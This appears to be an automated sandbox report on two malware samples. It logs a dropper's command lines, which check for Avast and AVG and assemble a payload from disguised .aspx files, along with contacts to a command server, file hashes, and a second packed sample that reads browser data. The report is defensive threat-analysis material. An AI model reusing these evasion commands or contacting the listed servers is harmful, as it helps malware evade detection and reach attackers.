C:\Windows\SysWOW64\at.exe
at 3874982763784yhwgdfg78234789s42809374918uf
C:\Windows\SysWOW64\cmd.exe
cmd /c cmd < Film.aspx & ping -n 5 localhost
C:\Windows\SysWOW64\cmd.exe
cmd
C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq AvastUI.exe"
C:\Windows\SysWOW64\find.exe
find /I /N "avastui.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq AVGUI.exe"
C:\Windows\SysWOW64\find.exe
find /I /N "avgui.exe"
C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^otPcqYaF$" Deliver.aspx
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif
Tanks.exe.pif A
C:\Windows\SysWOW64\PING.EXE
ping localhost -n 5
C:\Windows\SysWOW64\PING.EXE
ping -n 5 localhost
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bDIATguLPNddTCYKKaxjQJVwvtXO.bDIATguLPNddTCYKKaxjQJVwvtXO | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| NL | 109.206.241.33:80 | tcp | |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.117.19.2.in-addr.arpa | udp |
| NL | 109.206.241.33:80 | tcp | |
| NL | 109.206.241.33:80 | tcp | |
| NL | 109.206.241.33:80 | tcp | |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| NL | 109.206.241.33:80 | tcp | |
| NL | 109.206.241.33:80 | tcp | |
| US | 8.8.8.8:53 | 25.73.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Film.aspx
| MD5 | 8eb593f08a4cca9959a469af6528ac0d |
| SHA1 | 8f4ae3c90b6d653eb75224683358f12dfc442dca |
| SHA256 | 7903967eca6727d611e46d666d2871d4438e9bc65ea185e01787c8a8a3e5ce70 |
| SHA512 | 631403ca6e37a317158ba583e5b0f05e83157abc4cb4865f8d0d8f6e11ef39ab150fe948961aebcaff5c01ace0345ca6dc3882306ab0ce84eec6c1dfdf822ca9 |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Deliver.aspx
| MD5 | 701381da8e4a87f18a22b98eee09a22b |
| SHA1 | f5ff5c1714155b853a8335b1d359a010c012c596 |
| SHA256 | 8b21bc4f93cc9a8438ec08d1385f2d7dead6291a741fdfe7b6960c9f9917f6b3 |
| SHA512 | 55ef35ce31c1fac2ff91efb3b4a5f646f3cfc7a0c4592f9da3e444a6472203608e224cf55dfa5c79025247c41aa8cbad759ef65dee9f95fe5c244dee239dc141 |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Accurate.aspx
| MD5 | ffc713ff8173dac3c96bc583eb916705 |
| SHA1 | 3c1b3e1eb258e304722ecc876820a470d491467d |
| SHA256 | 8d9c5d3eb7d4bfeb8ab1c5f4dde38dea52624ed80b188648fbab2ada88505ae4 |
| SHA512 | 8af86a88e0bb60941ec5a55678c97f9a25518f2e140fc2e792115cb653b5f5a745630d970492565944116f3c5e5dc053c22b60ad8287ce5b921e47371125bc8f |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif
| MD5 | 6987e4cd3f256462f422326a7ef115b9 |
| SHA1 | 71672a495b4603ecfec40a65254cb3ba8766bbe0 |
| SHA256 | 3e26723394ade92f8163b5643960189cb07358b0f96529a477d37176d68aa0a0 |
| SHA512 | 4b1d7f7ffee39a2d65504767beeddd4c3374807a93889b14e7e73db11e478492dec349aedca03ce828f21a66bb666a68d3735443f4249556e10825a4cd7dfeb4 |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\xEvsgieS.dll
| MD5 | 4f3387277ccbd6d1f21ac5c07fe4ca68 |
| SHA1 | e16506f662dc92023bf82def1d621497c8ab5890 |
| SHA256 | 767a3fc4a7a6818cdc3f0b99aaa95db694f6bcde719d2057a88b3d4df3d74fac |
| SHA512 | 9da199ac69e3c0d4e0c6307e0ab8178f12cc25cb2f14c3511f6b64e6e60a925c860f3263cb38353a97b55a71ef4d27f8cb7fa3cfc08e7c1a349fd8d209dfa219 |
memory/4036-23-0x0000000000400000-0x0000000000435000-memory.dmp
memory/4036-30-0x0000000000400000-0x0000000000435000-memory.dmp
memory/3680-31-0x0000000000DE0000-0x0000000000ECB000-memory.dmp
memory/4036-32-0x0000000000DE0000-0x0000000000ECB000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-11-11 08:10
Reported
2024-11-11 08:13
Platform
win7-20241010-en
Max time kernel
73s
Max time network
37s
Command Line
Signatures
Reads user/profile data of web browsers
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2116 wrote to memory of 2512 | N/A | C:\Users\Admin\AppData\Local\Temp\PL\pb1115.exe | C:\Windows\system32\WerFault.exe |
| PID 2116 wrote to memory of 2512 | N/A | C:\Users\Admin\AppData\Local\Temp\PL\pb1115.exe | C:\Windows\system32\WerFault.exe |
| PID 2116 wrote to memory of 2512 | N/A | C:\Users\Admin\AppData\Local\Temp\PL\pb1115.exe | C:\Windows\system32\WerFault.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\PL\pb1115.exe
"C:\Users\Admin\AppData\Local\Temp\PL\pb1115.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2116 -s 1068
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| GB | 163.70.151.35:443 | www.facebook.com | tcp |
| US | 8.8.8.8:53 | aaa.apiaaaeg.com | udp |
Files
memory/2116-0-0x0000000140000000-0x000000014060D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\CabACE4.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\TarAD64.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |